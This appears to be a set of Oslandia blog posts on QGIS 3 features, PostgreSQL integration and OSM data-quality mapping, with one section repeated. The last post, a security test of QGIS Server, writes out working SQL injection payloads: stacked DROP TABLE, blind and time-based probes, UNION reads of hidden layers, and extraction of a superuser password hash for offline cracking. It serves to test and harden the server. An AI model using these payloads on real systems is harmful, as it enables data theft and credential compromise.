Those QEPs were accepted and we could work on the real implementation, so here we are, Auxiliary storage has now landed in master!

How

The aim of auxiliary storage is to propose a more integrated solution to manage these data defined properties :

  • Easy to use (one click)
  • Transparent for the user (map tools always available by default when labeling is activated)
  • Do not update the underlying data (it should work even when the layer is not editable)
  • Keep in sync with the datasource (as much as possible)
  • Store this data along or inside the project file

As said above, thanks to the Auxiliary Storage mechanism, map tools like Move Label, Rotate Label or Change Label are available by default. Then, when the user select the map tool to move a label and click for the first time on the map, a simple question is asked allowing to select a primary key :

Primary key choice dialog – (YES, you NEED a primary key for any data management)

From that moment on, a hidden table is transparently created to store all data defined values (positions, rotations, …) and joined to the original layer thanks to the primary key previously selected. When you move a label, the corresponding property is automatically created in the auxiliary layer. This way, the original data is not modified but only the joined auxiliary layer!

A new tab has been added in vector layer properties to manage the Auxiliary Storage mechanism. You can retrieve, clean up, export or create new properties from there :

Where the auxiliary data is really saved between projects?

We end up in using a light SQLite database which, by default, is just 8 Ko! When you save your project with the usual extension .qgs, the SQLite database is saved at the same location but with a different extension : .qgd.

Two thoughts with that choice: 

  • “Hey, I would like to store geometries, why no spatialite instead? “

Good point. We tried that at start in fact. But spatialite database initializing process using QGIS spatialite provider was found too long, really long. And a raw spatialite table weight about 4 Mo, because of the huge spatial reference system table, the numerous spatial functions and metadata tables. We chose to fall back onto using sqlite through OGR provider and it proved to be fast and stable enough. If some day, we achieve in merging spatialite provider and GDAL-OGR spatialite provider, with options to only create necessary SRS and functions, that would open news possibilities, like storing spatial auxiliary data.

  • “Does that mean that when you want to move/share a QGIS project, you have to manually manage these 2 files to keep them in the same location?!”

True, and dangerous isn’t it? Users often forgot auxiliary files with EasyCustomLabeling plugin.  Hence, we created a new format allowing to zip several files : .qgz.  Using that format, the SQLite database project.qgd and the regular project.qgs file will be embedded in a single project.zip file. WIN!!

Changing the project file format so that it can embed, data, fonts, svg was a long standing feature. So now we have a format available for self hosted QGIS project. Plugins like offline editing, Qconsolidate and other similar that aim at making it easy to export a portable GIS database could take profit of that new storage container.

Now, some work remains to add labeling connectors capabilities,  allow user to draw labeling paths by hand. If you’re interested in making this happen, please contact us!

 

 

More information

A full video showing auxiliary storage capabilities:

 

QEP: https://github.com/qgis/QGIS-Enhancement-Proposals/issues/27

PR New Zip format: https://github.com/qgis/QGIS/pull/4845

PR Editable Joined layers: https://github.com/qgis/QGIS/pull/4913

PR Auxiliary Storage: https://github.com/qgis/QGIS/pull/5086

Auxiliary Storage support in QGIS 3

For those who know how powerful QGIS can be using data defined widgets and expressions almost anywhere in styling and labeling settings, it remains today quite complex to store custom data.

For instance, moving a simple label using the label toolbar is not straightforward, that wonderful toolbar remains desperately greyed-out for manual labeling tweaks

…unless you do the following:

  • Set your vector layer editable (yes, it’s not possible with readonly data)
  • Add two columns in your data
  • Link the X property position to a column and the Y position to another

 

the Move Label map tool becomes available and ready to be used (while your layer is editable). Then, if you move a label, the underlying data is modified to store the position. But what happened if you want to fully use the Change Label map tool (color, size, style, and so on)?

 

Well… You just have to add a new column for each property you want to manage. No need to tell you that it’s not very convenient to use or even impossible when your data administrator has set your data in readonly mode…

A plugin, made some years ago named EasyCustomLabeling was made to address that issue. But it kept being full of caveats, like a dependency to another plugin (Memory layer saver) for persistence, or a full copy of the layer to label inside a memory layer which indeed led to loose synchronisation with the source layer.

Two years ago, the French Agence de l’eau Adour Garonne (a water basin agency) and the Ministry in charge of Ecology asked Oslandia to think out QGIS Enhancement proposals to port that plugin into QGIS core, among a few other things like labeling connectors or curved labels enhancements.

Those QEPs were accepted and we could work on the real implementation, so here we are, Auxiliary storage has now landed in master!

How

The aim of auxiliary storage is to propose a more integrated solution to manage these data defined properties :

  • Easy to use (one click)
  • Transparent for the user (map tools always available by default when labeling is activated)
  • Do not update the underlying data (it should work even when the layer is not editable)
  • Keep in sync with the datasource (as much as possible)
  • Store this data along or inside the project file

As said above, thanks to the Auxiliary Storage mechanism, map tools like Move Label, Rotate Label or Change Label are available by default. Then, when the user select the map tool to move a label and click for the first time on the map, a simple question is asked allowing to select a primary key :

Primary key choice dialog – (YES, you NEED a primary key for any data management)

From that moment on, a hidden table is transparently created to store all data defined values (positions, rotations, …) and joined to the original layer thanks to the primary key previously selected. When you move a label, the corresponding property is automatically created in the auxiliary layer. This way, the original data is not modified but only the joined auxiliary layer!

A new tab has been added in vector layer properties to manage the Auxiliary Storage mechanism. You can retrieve, clean up, export or create new properties from there :

Where the auxiliary data is really saved between projects?

We end up in using a light SQLite database which, by default, is just 8 Ko! When you save your project with the usual extension .qgs, the SQLite database is saved at the same location but with a different extension : .qgd.

Two thoughts with that choice: 

  • “Hey, I would like to store geometries, why no spatialite instead? “

Good point. We tried that at start in fact. But spatialite database initializing process using QGIS spatialite provider was found too long, really long. And a raw spatialite table weight about 4 Mo, because of the huge spatial reference system table, the numerous spatial functions and metadata tables. We chose to fall back onto using sqlite through OGR provider and it proved to be fast and stable enough. If some day, we achieve in merging spatialite provider and GDAL-OGR spatialite provider, with options to only create necessary SRS and functions, that would open news possibilities, like storing spatial auxiliary data.

  • “Does that mean that when you want to move/share a QGIS project, you have to manually manage these 2 files to keep them in the same location?!”

True, and dangerous isn’t it? Users often forgot auxiliary files with EasyCustomLabeling plugin.  Hence, we created a new format allowing to zip several files : .qgz.  Using that format, the SQLite database project.qgd and the regular project.qgs file will be embedded in a single project.zip file. WIN!!

Changing the project file format so that it can embed, data, fonts, svg was a long standing feature. So now we have a format available for self hosted QGIS project. Plugins like offline editing, Qconsolidate and other similar that aim at making it easy to export a portable GIS database could take profit of that new storage container.

Now, some work remains to add labeling connectors capabilities,  allow user to draw labeling paths by hand. If you’re interested in making this happen, please contact us!

 

 

More information

A full video showing auxiliary storage capabilities:

 

QEP: https://github.com/qgis/QGIS-Enhancement-Proposals/issues/27

PR New Zip format: https://github.com/qgis/QGIS/pull/4845

PR Editable Joined layers: https://github.com/qgis/QGIS/pull/4913

PR Auxiliary Storage: https://github.com/qgis/QGIS/pull/5086

Oslandia is baking some awesome QGIS 3 new features

QGIS 3.0 is now getting closer and closer, it’s the right moment to write about some major refactor and new features we have been baking at Oslandia.

A quick word about the release calendar, you probably felt like QGIS 3 freeze was expected for the end of August, didn’t you?

In fact, we have so many new major changes in the queue that the steering committee (PSC), advised by the core developers, decided to push twice the release date up up to the 27 of October. Release date has not be been pushed (yet).

At Oslandia we got involved in a dark list of hidden features of QGIS3.

They mostly aren’t easy to advertised visually, but you’ll appreciate them for sure!

  • Add  capabilities to store data in the project
    • add a new .qgz zipped file format container
    • have editable joins, with upsert capabilities (Insert Or Update)
    • Transparently store  and maintain in sync data in a sqlite database. Now custom labeling is pretty easy!
  • Coordinating work and tests on new node tool for data editing
  • Improving Z / m handling in edit tools and layer creation dialogs
  • Ticket reviewing and cleaning

Next articles will describe some of those tasks soon.

This work was a great opportunity to ramp up a new talented developer with commit rights on the repository! Welcome and congratulations to Paul our new core committer !

All this was possible with the support of many actors, but also thanks to the fundings of QGIS.org via Grant Applications or direct funding of QGIS server!

A last word, please help us in testing QGIS3, it’s the perfect moment to stress it, bugfix period is about to start !

 

 

 

Refresh your maps FROM postgreSQL !

Continuing our love story with PostgreSQL and QGIS, we asked QGIS.org a grant application during early 2017 spring.

The idea was to take benefit of very advanced PostgreSQL features, that probably never were used in a Desktop GIS client before.

Today, let’s see what we can do with the PostgreSQL NOTIFY feature!

Ever dreamt of being able to trigger things from outside QGIS? Ever wanted a magic stick to trigger actions in some clients from a database action?

X All The Y Meme | REFRESH QGIS FROM THE DATABASE !!! | image tagged in memes,x all the y | made w/ Imgflip meme maker

 

NOTIFY is a PostgreSQL specific feature allowing to generate notifications on a channel and optionally send a message — a payload in PG’s dialect .

In short, from within a transaction, we can raise a signal in a PostgreSQL queue and listen to it from a client.

In action

We hardcoded a channel named “qgis” and made QGIS able to LISTEN to NOTIFY events and transform them into Qt’s signals. The signals are connected to layer refresh when you switch on this rendering option.

Optionnally, adding a message filter will only redraw the layer for some specific events.

This mechanism is really versatile and we now can imagine many possibilities, maybe like trigger a notification message to your users from the database, interact with plugins, or even code a chat between users of the same database  (ok, this is stupid) !

 

More than just refresh layers?

The first implementation we chose was to trigger a layer refresh because we believe this is a good way for users to discover this new feature.

But QGIS rocks hey, doing crazy things for limited uses is not the way.

Thanks to feedback on the Pull Request, we added the possibility to trigger layer actions on notification.

That should be pretty versatile since you can do almost anything with those actions now.

Caveats

QGIS will open a permanent connection to PostgreSQL to watch the notify signals. Please keep that in mind if you have several clients and a limited number of connections.

Notify signals are only transmitted with the transaction, so when the COMMIT is raised. So be aware that this might not help you if users are inside an edit session.

QGIS has a lot of different caches, for attribute table for instance. We currently have no specific way to invalidate a specific cache, and then order QGIS to refresh it’s attribute table.

There is no way in PG to list all channels of a database session, that’s why we couldn’t propose a combobox list of available signals in the renderer option dialog. Anyway, to avoid too many issues, we decided to hardcode the channel name in QGIS with the name “qgis”. If this is somehow not enough for your needs, please contact us!

Conclusion

The github pull request is here : https://github.com/qgis/QGIS/pull/5179

We are convinced this would be really useful for real time application, let us know if that makes some bells ring on your side!

More to come soon, stay tuned!

 

 

Undo Redo stack is back QGIS Transaction groups

Let’s keep on looking at what we did in QGIS.org grant application of early 2017 spring.

At Oslandia, we use a lot the transaction groups option of QGIS. It was an experimental feature in QGIS 2.X allowing to open only one common Postgres transaction for all layers sharing the same connection string.

Transaction group option

When activated, that option will bring many killer features:

  • Users can switch all the layers in edit mode at once. A real time saver.
  • Every INSERT, UPDATE or DELETE is forwarded immediately to the database, which is nice for:
    • Evaluating on the fly if database constraints are satisfied or not. Without transaction groups this is only done when saving the edits and this can be frustrating to create dozens of features and having one of them rejected because of a foreign key constraint…
    • Having triggers evaluated on the fly.  QGIS is so powerful when dealing with “thick database” concepts that I would never go back to a pure GIS ignoring how powerful databases can be !
    • Playing with QgsTransaction.ExecuteSQL allows to trigger stored procedures in PostgreSQL in a beautiful API style interface. Something like
SELECT invert_pipe_direction('pipe1');
  • However, the implementation was flagged “experimental” because some caveats where still causing issues:
    • Committing on the fly was breaking the logic of the undo/redo stack. So there was no way to do a local edit. No Ctrl+Z!  The only way to rollback was to stop the edit session and loose all the work. Ouch.. Bad!
    • Playing with ExecuteSQL did not dirty the QGIS edit buffer. So, if during an edit session no edit action was made using QGIS native tools, there was no clean way to activate the “save edits” icon.
    • When having some failures in the triggers, QGIS may loose DB connection and thus create a silent ROLLBACK.

We decided to try to restore the undo/redo stack by saving the history edits in PostgreSQL SAVEPOINTS and see if we could restore the original feature in QGIS.

And.. it worked!

Let’s see that in action:

 

Potential caveats ?

At start, we worried about how heavy all those savepoints would be for the database. It turns out that maybe for really massive geometries, and heavy editing sessions, this could start to weight a bit, but honestly far away from PostgreSQL capabilities.

 

Up to now, we didn’t really find any issue with that..

And we didn’t address the silent ROLLBACK that occurs sometimes, because it is generated by buggy stored procedures, easy to solve.

Some new ideas came to us when working in that area. For instance, if a transaction locks a feature, QGIS just… wait for the lock to be released. I think we should find a way to advertise those locks to the users, that would be great! If you’re interested in making that happen, please contact us.

 

More to come soon, stay tuned!

 

 

OSM data quality assessment: producing map to illustrate data quality

At Oslandia, we like working with Open Source tool projects and handling Open (geospatial) Data. In this article series, we will play with the OpenStreetMap (OSM) map and subsequent data. Here comes the eighth article of this series, dedicated to the OSM data quality evaluation, through production of new maps.

1 Description of OSM element

 1.1 Element metadata extraction

As mentionned in a previous article dedicated to metadata extraction, we have to focus on element metadata itself if we want to produce valuable information about quality. The first questions to answer here are straightforward: what is an OSM element? and how to extract its associated metadata?. This part is relatively similar to the job already done with users.

We know from previous analysis that an element is created during a changeset by a given contributor, may be modified several times by whoever, and may be deleted as well. This kind of object may be either a “node”, a “way” or a “relation”. We also know that there may be a set of different tags associated with the element. Of course the list of every operations associated to each element is recorded in the OSM data history. Let’s consider data around Bordeaux, as in previous blog posts:

import pandas as pd
elements = pd.read_table('../src/data/output-extracts/bordeaux-metropole/bordeaux-metropole-elements.csv', parse_dates=['ts'], index_col=0, sep=",")
elements.head().T
   elem        id  version  visible         ts    uid  chgset
0  node  21457126        2    False 2008-01-17  24281  653744
1  node  21457126        3    False 2008-01-17  24281  653744
2  node  21457126        4    False 2008-01-17  24281  653744
3  node  21457126        5    False 2008-01-17  24281  653744
4  node  21457126        6    False 2008-01-17  24281  653744

This short description helps us to identify some basic features, which are built in the following snippets. First we recover the temporal features:

elem_md = (elements.groupby(['elem', 'id'])['ts']
            .agg(["min", "max"])
            .reset_index())
elem_md.columns = ['elem', 'id', 'first_at', 'last_at']
elem_md['lifespan'] = (elem_md.last_at - elem_md.first_at)/pd.Timedelta('1D')
extraction_date = elements.ts.max()
elem_md['n_days_since_creation'] = ((extraction_date - elem_md.first_at)
                                  / pd.Timedelta('1d'))
elem_md['n_days_of_activity'] = (elements
                              .groupby(['elem', 'id'])['ts']
                              .nunique()
                              .reset_index())['ts']
elem_md = elem_md.sort_values(by=['first_at'])
                                    213418
elem                                  node
id                               922827508
first_at               2010-09-23 00:00:00
last_at                2010-09-23 00:00:00
lifespan                                 0
n_days_since_creation                 2341
n_days_of_activity                       1

Then the remainder of the variables, e.g. how many versions, contributors, changesets per elements:

    elem_md['version'] = (elements.groupby(['elem','id'])['version']
                          .max()
                          .reset_index())['version']
    elem_md['n_chgset'] = (elements.groupby(['elem', 'id'])['chgset']
                           .nunique()
                           .reset_index())['chgset']
    elem_md['n_user'] = (elements.groupby(['elem', 'id'])['uid']
                         .nunique()
                         .reset_index())['uid']
    osmelem_last_user = (elements
                         .groupby(['elem','id'])['uid']
                         .last()
                         .reset_index())
    osmelem_last_user = osmelem_last_user.rename(columns={'uid':'last_uid'})
    elements = pd.merge(elements, osmelem_last_user,
                       on=['elem', 'id'])
    elem_md = pd.merge(elem_md,
                       elements[['elem', 'id', 'version', 'visible', 'last_uid']],
                       on=['elem', 'id', 'version'])
    elem_md = elem_md.set_index(['elem', 'id'])
    elem_md.sample().T
elem                                  node
id                              1340445266
first_at               2011-06-26 00:00:00
last_at                2011-06-27 00:00:00
lifespan                                 1
n_days_since_creation                 2065
n_days_of_activity                       2
version                                  2
n_chgset                                 2
n_user                                   1
visible                              False
last_uid                            354363

As an illustration we have above an old two-versionned node, no more visible on the OSM website.

1.2 Characterize OSM elements with user classification

This set of features is only descriptive, we have to add more information to be able to characterize OSM data quality. That is the moment to exploit the user classification produced in the last blog post!

As a recall, we hypothesized that clustering the users permits to evaluate their trustworthiness as OSM contributors. They are either beginners, or intermediate users, or even OSM experts, according to previous classification.

Each OSM entity may have received one or more contributions by users of each group. Let’s say the entity quality is good if its last contributor is experienced. That leads us to classify the OSM entities themselves in return!

How to include this information into element metadata?

We first need to recover the results of our clustering process.

user_groups = pd.read_hdf("../src/data/output-extracts/bordeaux-metropole/bordeaux-metropole-user-kmeans.h5", "/individuals")
user_groups.head()
           PC1       PC2       PC3       PC4       PC5       PC6  Xclust
uid                                                                     
1626 -0.035154  1.607427  0.399929 -0.808851 -0.152308 -0.753506       2
1399 -0.295486 -0.743364  0.149797 -1.252119  0.128276 -0.292328       0
2488  0.003268  1.073443  0.738236 -0.534716 -0.489454 -0.333533       2
5657 -0.889706  0.986024  0.442302 -1.046582 -0.118883 -0.408223       4
3980 -0.115455 -0.373598  0.906908  0.252670  0.207824 -0.575960       5

As a remark, there were several important results to save after the clustering process; we decided to serialize them into a single binary file. Pandas knows how to manage such file, that would be a pity not to take advantage of it!

We recover the individuals groups in the eponym binary file tab (column Xclust), and only have to join it to element metadata as follows:

elem_md = elem_md.join(user_groups.Xclust, on='last_uid')
elem_md = elem_md.rename(columns={'Xclust':'last_uid_group'})
elem_md.reset_index().to_csv("../src/data/output-extracts/bordeaux-metropole/bordeaux-metropole-element-metadata.csv")
elem_md.sample().T
elem                                  node
id                              1530907753
first_at               2011-12-04 00:00:00
last_at                2011-12-04 00:00:00
lifespan                                 0
n_days_since_creation                 1904
n_days_of_activity                       1
version                                  1
n_chgset                                 1
n_user                                   1
visible                               True
last_uid                             37548
last_uid_group                           2

From now, we can use the last contributor cluster as an additional information to generate maps, so as to study data quality…

Wait… There miss another information, isn’t it? Well yes, maybe the most important one, when dealing with geospatial data: the location itself!

1.3 Recover the geometry information

Even if Pyosmium library is able to retrieve OSM element geometries, we realized some tests with an other OSM data parser here: osm2pgsql.

We can recover geometries from standard OSM data with this tool, by assuming the existence of an osm database, owned by user:

osm2pgsql -E 27572 -d osm -U user -p bordeaux_metropole --hstore ../src/data/raw/bordeaux-metropole.osm.pbf

We specify a France-focused SRID (27572), and a prefix for naming output databases point, line, polygon and roads.

We can work with the line subset, that contains the physical roads, among other structures (it roughly corresponds to the OSM ways), and build an enriched version of element metadata, with geometries.

First we can create the table bordeaux_metropole_geomelements, that will contain our metadata…

DROP TABLE IF EXISTS bordeaux_metropole_elements;
DROP TABLE IF EXISTS bordeaux_metropole_geomelements;
CREATE TABLE bordeaux_metropole_elements(
       id int,
       elem varchar,
       osm_id bigint,
       first_at varchar,
       last_at varchar,
       lifespan float,
       n_days_since_creation float,
       n_days_of_activity float,
       version int,
       n_chgsets int,
       n_users int,
       visible boolean,
       last_uid int,
       last_user_group int
);

…then, populate it with the data accurate .csv file…

COPY bordeaux_metropole_elements
FROM '/home/rde/data/osm-history/output-extracts/bordeaux-metropole/bordeaux-metropole-element-metadata.csv'
WITH(FORMAT CSV, HEADER, QUOTE '"');

…and finally, merge the metadata with the data gathered with osm2pgsql, that contains geometries.

SELECT l.osm_id, h.lifespan, h.n_days_since_creation,
h.version, h.visible, h.n_users, h.n_chgsets,
h.last_user_group, l.way AS geom
INTO bordeaux_metropole_geomelements
FROM bordeaux_metropole_elements as h
INNER JOIN bordeaux_metropole_line as l
ON h.osm_id = l.osm_id AND h.version = l.osm_version
WHERE l.highway IS NOT NULL AND h.elem = 'way'
ORDER BY l.osm_id;

Wow, this is wonderful, we have everything we need in order to produce new maps, so let’s do it!

2 Keep it visual, man!

From the last developments and some hypothesis about element quality, we are able to produce some customized maps. If each OSM entities (e.g. roads) can be characterized, then we can draw quality maps by highlighting the most trustworthy entities, as well as those with which we have to stay cautious.

In this post we will continue to focus on roads within the Bordeaux area. The different maps will be produced with the help of Qgis.

2.1 First step: simple metadata plotting

As a first insight on OSM elements, we can plot each OSM ways regarding simple features like the number of users who have contributed, the number of version or the element anteriority.

Figure 1: Number of active contributors per OSM way in Bordeaux

 

Figure 2: Number of versions per OSM way in Bordeaux

With the first two maps, we see that the ring around Bordeaux is the most intensively modified part of the road network: more unique contributors are implied in the way completion, and more versions are designed for each element. Some major roads within the city center present the same characteristics.

Figure 3: Anteriority of each OSM way in Bordeaux, in years

If we consider the anteriority of OSM roads, we have a different but interesting insight of the area. The oldest roads are mainly located within the city center, even if there are some exceptions. It is also interesting to notice that some spatial patterns arise with temporality: entire neighborhoods are mapped within the same anteriority.

2.2 More complex: OSM data merging with alternative geospatial representations

To go deeper into the mapping analysis, we can use the INSEE carroyed data, that divides France into 200-meter squared tiles. As a corollary OSM element statistics may be aggregated into each tile, to produce additional maps. Unfortunately an information loss will occur, as such tiles are only defined where people lives. However it can provides an interesting alternative illustration.

To exploit such new data set, we have to merge the previous table with the accurate INSEE table. Creating indexes on them is of great interest before running such a merging operation:

CREATE INDEX insee_geom_gist
ON open_data.insee_200_carreau USING GIST(wkb_geometry);
CREATE INDEX osm_geom_gist
ON bordeaux_metropole_geomelements USING GIST(geom);

DROP TABLE IF EXISTS bordeaux_metropole_carroyed_ways;
CREATE TABLE bordeaux_metropole_carroyed_ways AS (
SELECT insee.ogc_fid, count(*) AS nb_ways,
avg(bm.version) AS avg_version, avg(bm.lifespan) AS avg_lifespan,
avg(bm.n_days_since_creation) AS avg_anteriority,
avg(bm.n_users) AS avg_n_users, avg(bm.n_chgsets) AS avg_n_chgsets,
insee.wkb_geometry AS geom
FROM open_data.insee_200_carreau AS insee
JOIN bordeaux_metropole_geomelements AS bm
ON ST_Intersects(insee.wkb_geometry, bm.geom)
GROUP BY insee.ogc_fid
);

As a consequence, we get only 5468 individuals (tiles), a quantity that must be compared to the 29427 roads previously handled… This operation will also simplify the map analysis!

We can propose another version of previous maps by using Qgis, let’s consider the average number of contributors per OSM roads, for each tile:

Figure 4: Number of contributors per OSM roads, aggregated by INSEE tile

2.3 The cherry on the cake: representation of OSM elements with respect to quality

Last but not least, the information about last user cluster can shed some light on OSM data quality: by plotting each roads according to the last user who has contributed, we might identify questionable OSM elements!

We simply have to design similar map than in previous section, with user classification information:

Figure 5: OSM roads around Bordeaux, according to the last user cluster (1: C1, relation experts; 2: C0, versatile expert contributors; 3: C4, recent one-shot way contributors; 4: C3, old one-shot way contributors; 5: C5, locally-unexperienced way specialists)

According to the clustering done in the previous article (be careful, the legend is not the same here…), we can make some additional hypothesis:

  • Light-blue roads are OK, they correspond to the most trustful cluster of contributors (91.4% of roads in this example)
  • There is no group-0 road (group 0 corresponds to cluster C2 in the previous article)… And that’s comforting! It seems that “untrustworthy” users do not contribute to roads or -more probably- that their contributions are quickly amended.
  • Other contributions are made by intermediate users: a finer analysis should be undertaken to decide if the corresponding elements are valid. For now, we can consider everything is OK, even if local patterns seem strong. Areas of interest should be verified (they are not necessarily of low quality!)

For sure, it gives a fairly new picture of OSM data quality!

3 Conclusion

In this last article, we have designed new maps on a small area, starting from element metadata. You have seen the conclusion of our analysis: characterizing the OSM data quality starting from the user contribution history.

Of course some works still have to be done, however we detailed a whole methodology to tackle the problem. We hope you will be able to reproduce it, and to design your own maps!

Feel free to contact us if you are interested in this topic!

QGIS Server: security aspect

Testing and proofing QGIS 3 against security leaks – a bit of context

QGIS Server is an open source OGC data server which uses QGIS engine as backend. It becomes really awesome because a simple desktop qgis project file can be rendered as web services with exactly the same rendering, and without any mapfile or xml coding by hand.

QGIS Server provides a way to serve OGC web services like WMS, WCS and WFS resources from a QGIS project, but can also extend services like GetPrint which takes advantage of QGIS’s map composer power to generate high quality PDF outputs.

Oslandia decided to get strongly involved in QGIS server refactoring work and co organized a dedicated Code Sprint in Lyon .

We also want to warmly thank Orange (French Internet and Phone provider) for its financial supports for helping us ensure QGIS 3 is the next generation of bullet proof, fast and easy to use an open source web map server. Résultat de recherche d'images pour "orange.com logo"

 

 

When it comes to managing a web map server in critical production environment, security is a mandatory item. Main issues specific to OGC web services are SQL Injections . Those attacks try to find leaks in the queries sent to the server by executing SQL statements. Oslandia decided to tackle that issue early in the server refactoring process. Here is what has been done to check potential leaks in current code and ensure that no regression can be done in the future versions.

Real work now!

QGIS Server runs as a FastCGI process with a properly configured NGINX or an Apache web server on which we can send requests. For example, trying to retrieve some information at a specific pixel location on a map can be done by a GetFeatureInfo request where the position is given thanks to the I and J parameters:

http://myserver.com/qgisserver?
QUERY_LAYERS=point&LAYERS=point&
SERVICE=WMS&
WIDTH=500&HEIGHT=500&
BBOX=606171,4822867,612834,4827375&CRS=EPSG:32613&
MAP=/home/user/project.qgs&
VERSION=1.1.1&
REQUEST=GetFeatureInfo&
I=250&J=250

The response will be something like this:

GetFeatureInfo results
Layer 'point'
Feature 1
pkuid = '1'
text = 'Single point'
name = 'a'

There’s more. The FILTER parameter can be used instead of the position in pixels. Then, we can retrieve information on a specific feature:

http://myserver.com/qgisserver?
QUERY_LAYERS=point&LAYERS=point&
SERVICE=WMS&
WIDTH=500&HEIGHT=500&
BBOX=606171,4822867,612834,4827375&CRS=EPSG:32613&
MAP=/home/user/project.qgs&
VERSION=1.1.1&
REQUEST=GetFeatureInfo&
FILTER=point:"name" = 'b'

With this specific filter, we get the underlying data for the feature named ‘b’:

GetFeatureInfo results
Layer 'point'
Feature 2
pkuid = '2'
text = ''
name = 'b'

But how does it work? The filter is forwarded to the dataprovider as a WHERE clause. And in QGIS case, that clause is directly forwarded to the database server if the datasource is a database. (Note: for files datasource, QGIS loads the dataset in memory, so … use a database is always better). A simplified example:

SELECT * FROM point WHERE ( "name" = 'b' );

It’s a very convenient way of retrieving information, but it’s also the entry point for SQL injection attack. QGIS Server actually already checks the sanity of requests to avoid this kind of attacks. We needed to prove the effectiveness of those checks, so we deactivated them and tried to inject SQL through this FILTER. You know, just to see what happens!

Stacked queries

Firstly, we tried the most obvious attack : stacked queries. The idea is to use the semicolon character to terminate the initial query and then execute your own one. For example withFILTER=point:”name” = ‘b’ ); DROP TABLE point —, we would like to execute the underlying query:

SELECT * FROM point where ( "name" = 'b' ); DROP TABLE point -- )

The aim is obviously to damage the database. However, even without the sanity check, it doesn’t work because of the parsing step which splits the filter string in several subfilters thanks to the semicolon character:

subfilter 1: point:"name" = 'b' )
subfilter 2: DROP TABLE point -- )

Moreover, the expected format for a filter is something like tablename:”column_name” = ‘value’. Thus, the subfilter 2 is just ignored and never reaches the WHERE clause. And it’s true whatever the position of the semicolon. So even a filter like ‘FILTER=point:”name” = ‘b ); DROP TABLE point –‘‘ (see the injection within the value) does not work.

By the way, unicode is properly decoded… Thus, this kind of attack does not work either: FILTER=point:”name” = ‘b’ )%3B DROP TABLE point — (where %3B is unicode for semicolon).

Good point QGIS, let’s go further now.

Boolean-based blind attack

The idea behind blind attack is to run some queries and check the resulting behaviour to detect errors (or not). And this time, without the sanity check, it’s successful!

The first step is to detect the kind of database used by the QGIS project. A simple query allows to do that with FILTER=point:”name” = ‘b’) OR (SELECT version() = ”). The SQL query actually executed is:

SELECT * FROM point WHERE ( "name" = 'b' ) OR ( SELECT version() = '' )

We know that the feature named ‘b’ exists. So, if the GetFeatureInfo returns a result which is not for the feature ‘b’, it means that the version() function is not defined. In our case, we have this result:

GetFeatureInfo results
Layer 'point'
Feature 1
pkuid = '1'
text = 'Single point'
name = 'a'

So the database is not PostgreSQL. However, we deduce that the database is SQLite because of the valid result returned when FILTER=point:”name” = ‘b’) OR ( SELECT sqlite_version() = ” ) is used!

Time-based blind attack

Time based attack are used to guess what database is used behind the scene by using time functions that give specific results for each database type. And once you know your database, you potentially know its know security leaks…

To perform a time-based attack, a delay is introduced in the query. Then, the response time of the server allows to deduce if the assumption is correct. Once again, we have some results when the sanity check is deactivated!

Thanks to the previous attack, we know here that the database used by the project is SQLite. But, unlike some database like PostgreSQL where a pg_sleep function exists, there are none in SQLite. So we have to use a tip to spend some time in the query. So, finally, if we want to retrieve the current version, there is nothing simpler with the next filter:FILTER=point:”name” = ‘b’) AND (select case sqlite_version() when ‘3.10.0’ then substr(upper(hex(randomblob(99999999))),0,1) end)–.

SELECT * FROM point
    WHERE ( "name" = 'b' )
    AND (
        SELECT CASE sqlite_version() WHEN '3.10.0' THEN
            substr(upper(hex(randomblob(99999999))),0,1)
        END
    )
--

With this request, the response time of the server is about 0.0123 seconds. However, if we run the same query but this time by replacing ‘3.10.0’ with ‘3.15.0’, the response time is about 2.9 seconds!

UNION-based attack

Since we cannot execute some custom queries to directly damage the database, we tried to retrieve information which should be, in theory, hidden to the client. WIth Union Based attacks, it can be possible to get whole table contents (nasty isn’t it?). Check that for a demo: https://www.youtube.com/watch?v=N_rzhZWNwlU

So we launched those attacks and again, once the sanity check deactivated in QGIS server code, attacks succeeded. Those sanity check play well again !

Within the QGIS Server configuration, it is possible to define a layer as EXCLUDED. Then, a client cannot get information for this specific layer. In our case, the aoi layer is excluded in the project and the GetFeatureInfo always returns empty results if we query it. However, let’s see what happens with the WHERE clause when this filter is used:FILTER=point:”name” = ‘fake’) UNION SELECT 1,1,* FROM aoi —.

SELECT * FROM point WHERE ( "name" = 'fake' ) UNION SELECT 1,1,* FROM aoi -- )

As there’s no feature named ‘fake’, we retrieve data from the aoi layer!

GetFeatureInfo results
Layer 'point'
Feature 1
pkuid = '1'
text = '1'
name = 'private_value'

From this, we can apply the attack to retrieve other informations such as names of tables within the database. For the next example, now that we know that a SQLite database is currently used (thanks to the blind attack), we can write a filter like this: FILTER=point:”name” = ‘fake’) UNION SELECT 1 ,1,name,1,1 FROM sqlite_master WHERE type = “table” —

GetFeatureInfo results
Layer 'point'
Feature 1
pkuid = '1'
text = 'SpatialIndex'
name = ''

That’s not a big deal!?

Thanks to the previous injections, plenty of possibilities are right in front of us. And according to the system administration of the server hosting QGIS Server, extensions currently loaded, password strentgh of database users and many more, an attacker may be able to do much more damage than just retrieve some data from a hidden layer… In this part, we will assume that a PostgreSQL database is running!

We observed that UNION-based attacks are not working with the PostgreSQL backend, even with the sanity check deactivated, due to some closing parenthesis. However, combining the Boolean-based blind attack with brute force pattern matching, we are able to extract critical informations:

FILTER=
point:"name" = 'b' OR (
    SELECT usename FROM pg_user WHERE
        usesuper IS TRUE
        AND usename LIKE 'a%'
    )
    != ''

Obviously, the aim of the filter is to find the name of a superuser. Either the response is about the ‘b’ feature and there is no superuser matching the regular expression ‘a\S‘, either the response is not about ‘b’ and then a superuser beginning with the lettera* exists. By iterating over the pattern, we are able to retrieve the name of a superuser! Clearly it requires time and resources but it’s a powerful technique very widely used. In our case, a superuser named foo is found. And once we have a superuser name, we are able to retrieve it’s MD5 password with the same technique:

FILTER=
point:"name" = 'b' OR (
    SELECT passwd FROM pg_shadow WHERE usename = 'foo'
    AND passwd LIKE 'md5a%'
) != ''

And if the password is not strong enough, cracking the MD5 hash is not very complicated with the good tools: hashcat, mdcrack, … For example on my laptop, MDCrack (with wine) is able to test more than 35 millions MD5 hash per seconds:

$ wine MDCrack-sse.exe --benchmark
System / Starting MDCrack v1.8(3)
System / Detected processor(s): 4 x 2.39 Ghz INTEL Itanium | MMX | SSE | SSE2 | SSE3

------------------------------/ MD5 / DH / 4 Threads
Info   / Benchmarking ( pass #1 )... 35 193 192 ( 3.52e+007 ) h/s.

Thanks to the previous step, we got the following hash bdbf4c08fb950992d27f229a08cba675 and MDCrack was able to crack it in less than 10 minutes:

